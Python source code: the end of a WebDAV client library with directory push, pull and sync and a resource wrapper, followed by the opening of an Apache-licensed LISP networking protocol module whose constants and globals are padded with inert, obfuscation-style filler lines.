request = self.Request(options=options)
request.perform()
request.close()
return parse(response, option)
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def set_property(self, remote_path, option):
def data(option):
root_node = etree.Element("propertyupdate", xmlns="DAV:")
root_node.set('xmlns:u', option.get('namespace', ""))
set_node = etree.SubElement(root_node, "set")
prop_node = etree.SubElement(set_node, "prop")
opt_node = etree.SubElement(prop_node, "{namespace}:{name}".format(namespace='u', name=option['name']))
opt_node.text = option.get('value', "")
tree = etree.ElementTree(root_node)
buff = BytesIO()
tree.write(buff)
return buff.getvalue()
try:
urn = Urn(remote_path)
if not self.check(urn.path()):
raise RemoteResourceNotFound(urn.path())
url = {'hostname': self.webdav.hostname, 'root': self.webdav.root, 'path': urn.quote()}
options = {
'URL': "{hostname}{root}{path}".format(**url),
'CUSTOMREQUEST': Client.requests['set_metadata'],
'HTTPHEADER': self.get_header('get_metadata'),
'POSTFIELDS': data(option)
}
request = self.Request(options=options)
request.perform()
request.close()
except pycurl.error as e:
raise NotConnection(self.webdav.hostname+" : "+repr(e))
def push(self, remote_directory, local_directory):
def prune(src, exp):
return [sub(exp, "", item) for item in src]
urn = Urn(remote_directory, directory=True)
if not self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_directory)
if not os.path.isdir(local_directory):
raise OptionNotValid(name="local_path", value=local_directory)
if not os.path.exists(local_directory):
raise LocalResourceNotFound(local_directory)
paths = self.list(urn.path())
expression = "{begin}{end}".format(begin="^", end=urn.path())
remote_resource_names = prune(paths, expression)
for local_resource_name in listdir(local_directory):
local_path = os.path.join(local_directory, local_resource_name)
remote_path = "{remote_directory}{resource_name}".format(remote_directory=urn.path(), resource_name=local_resource_name)
if os.path.isdir(local_path):
if not self.check(remote_path=remote_path):
self.mkdir(remote_path=remote_path)
self.push(remote_directory=remote_path, local_directory=local_path)
else:
if local_resource_name in remote_resource_names:
continue
self.upload_file(remote_path=remote_path, local_path=local_path)
def pull(self, remote_directory, local_directory):
def prune(src, exp):
return [sub(exp, "", item) for item in src]
urn = Urn(remote_directory, directory=True)
if not self.is_dir(urn.path()):
raise OptionNotValid(name="remote_path", value=remote_directory)
if not os.path.exists(local_directory):
raise LocalResourceNotFound(local_directory)
local_resource_names = listdir(local_directory)
paths = self.list(urn.path())
expression = "{begin}{end}".format(begin="^", end=remote_directory)
remote_resource_names = prune(paths, expression)
for remote_resource_name in remote_resource_names:
local_path = os.path.join(local_directory, remote_resource_name)
remote_path = "{remote_directory}{resource_name}".format(remote_directory=urn.path(), resource_name=remote_resource_name)
remote_urn = Urn(remote_path)
if self.is_dir(remote_urn.path()):
if not os.path.exists(local_path):
os.mkdir(local_path)
self.pull(remote_directory=remote_path, local_directory=local_path)
else:
if remote_resource_name in local_resource_names:
continue
self.download_file(remote_path=remote_path, local_path=local_path)
def sync(self, remote_directory, local_directory):
self.pull(remote_directory=remote_directory, local_directory=local_directory)
self.push(remote_directory=remote_directory, local_directory=local_directory)
class Resource(object):
def __init__(self, client, urn):
self.client = client
self.urn = urn
def __str__(self):
return "resource {path}".format(path=self.urn.path())
def is_dir(self):
return self.client.is_dir(self.urn.path())
def rename(self, new_name):
old_path = self.urn.path()
parent_path = self.urn.parent()
new_name = Urn(new_name).filename()
new_path = "{directory}{filename}".format(directory=parent_path, filename=new_name)
self.client.move(remote_path_from=old_path, remote_path_to=new_path)
self.urn = Urn(new_path)
def move(self, remote_path):
new_urn = Urn(remote_path)
self.client.move(remote_path_from=self.urn.path(), remote_path_to=new_urn.path())
self.urn = new_urn
def copy(self, remote_path):
urn = Urn(remote_path)
self.client.copy(remote_path_from=self.urn.path(), remote_path_to=remote_path)
return Resource(self.client, urn)
def info(self, params=None):
info = self.client.info(self.urn.path())
if not params:
return info
return {key: value for (key, value) in info.items() if key in params}
def clean(self):
return self.client.clean(self.urn.path())
def check(self):
return self.client.check(self.urn.path())
def read_from(self, buff):
self.client.upload_from(buff=buff, remote_path=self.urn.path())
def read(self, local_path):
return self.client.upload_sync(local_path=local_path, remote_path=self.urn.path())
def read_async(self, local_path, callback=None):
return self.client.upload_async(local_path=local_path, remote_path=self.urn.path(), callback=callback)
def write_to(self, buff):
return self.client.download_to(buff=buff, remote_path=self.urn.path())
def write(self, local_path):
return self.client.download_sync(local_path=local_path, remote_path=self.urn.path())
def write_async(self, local_path, callback=None):
return self.client.download_async(local_path=local_path, remote_path=self.urn.path(), callback=callback)
def publish(self):
return self.client.publish(self.urn.path())
def unpublish(self):
return self.client.unpublish(self.urn.path())
@property
def property(self, option):
return self.client.get_property(remote_path=self.urn.path(), option=option)
@property.setter
def property(self, option, value):
option['value'] = value.__str__()
self.client.set_property(remote_path=self.urn.path(), option=option)
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy . distance import vincenty
import curve25519
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
lisp_print_rloc_probe_list = False
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
lisp_registered_count = 0
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
lisp_crypto_ephem_port = None
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
lisp_pitr = False
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
lisp_l2_overlay = False
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
lisp_register_all_rtrs = True
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
if 83 - 83: OoooooooOO
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
if 50 - 50: I1IiiI
lisp_nat_traversal = False
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
lisp_program_hardware = False
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
if 91 - 91: oO0o % Oo0Ooo
lisp_ipc_lock = None
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
lisp_ms_rtr_list = [ ]
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
lisp_nat_state_info = { }
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time . time ( )
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
lisp_last_icmp_too_big_sent = 0
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
lisp_policies = { }
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
if 87 - 87: i11iIiiIii
lisp_load_split_pings = False
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
lisp_eid_hashes = [ ]
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
lisp_reassembly_queue = { }
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
lisp_pubsub_cache = { }
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
lisp_decent_push_configured = False
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
lisp_ipc_socket = None
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
lisp_ms_encryption_keys = { }
lisp_ms_json_keys = { }
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
lisp_rtr_nat_trace_cache = { }
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
lisp_glean_mappings = [ ]
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
lisp_gleaned_groups = { }
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
if 31 - 31: OOooOOo
lisp_map_reply_action_string = [ "no-action" , "native-forward" ,
"send-map-request" , "drop-action" , "policy-denied" , "auth-failure" ]
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
LISP_MR_TTL = ( 24 * 60 )
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
